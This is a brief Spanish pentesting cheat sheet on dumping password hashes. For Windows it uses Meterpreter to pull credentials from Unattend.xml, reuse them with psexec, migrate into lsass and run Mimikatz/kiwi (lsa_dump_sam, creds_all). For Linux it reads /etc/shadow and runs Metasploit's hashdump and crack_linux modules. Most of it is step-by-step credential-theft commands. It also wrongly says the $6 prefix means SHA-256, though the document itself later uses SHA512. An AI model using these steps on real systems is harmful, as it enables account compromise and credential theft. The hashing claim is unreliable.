Dumpear Hashes

Dumpear hashes se refiere al proceso de extraer o volcar los valores hash de contraseñas almacenadas en un sistema. Estos hashes son representaciones cifradas de contraseñas que los sistemas utilizan para autenticar usuarios sin almacenar las contraseñas en texto plano

Windows

Por defecto los hashes se encuentran en el SAM (Security Accounts Manager)

Rutas típicas

C:\\Windows\Panther\Unattend.xml (Suele estar codificada en base64)

C:\\Windows\Panther\Autounattend.xml

Búsqueda de Archivos

Usando metasploit una vez hayamos establecido la sesión meterpreter introducimos los siguientes comandos

meterpreter > search -f Unattend.xml

download unattend.xml

Al final de este archivo pondra la contraseña y usuario, y nos conectaremos usando psexec con estas credenciales

psexec.py <user>@ip

Mimikatz

Una vez tengamos la sesión meterpreter

Migraremos al proceso lsass para disponer de máximos privilegios

pgrep lsass

migrate <PID>

Cargamos la extensión kiwi en meterpreter

load kiwi

Para ver todos los comandos

?

Dumpeamos hashes de la SAM y tambien obtenemos la SysKey

lsa_dump_sam

Listamos algunas posibles credenciales

creds_all

Linux

Partimos de una consola meterpreter o bash y visualizamos el archivo /etc/shadow (solo si somos root)

El hash nos indica $6, esto quiere decir que está encriptado en el algoritmo SHA-256

Teniendo una sesión de meterpreter abierta podemos usar el módulo de hashdump

use post/linux/gather/hashdump

Indicamos la session donde lo vamos a importar

set SESSIONS <sesión>

run

Crackeamos usando Metasploit o podemos usar john

Módulo: use auxiliary/analyze/crack_linux

set SHA512 true (<codigo> por SHA512)

run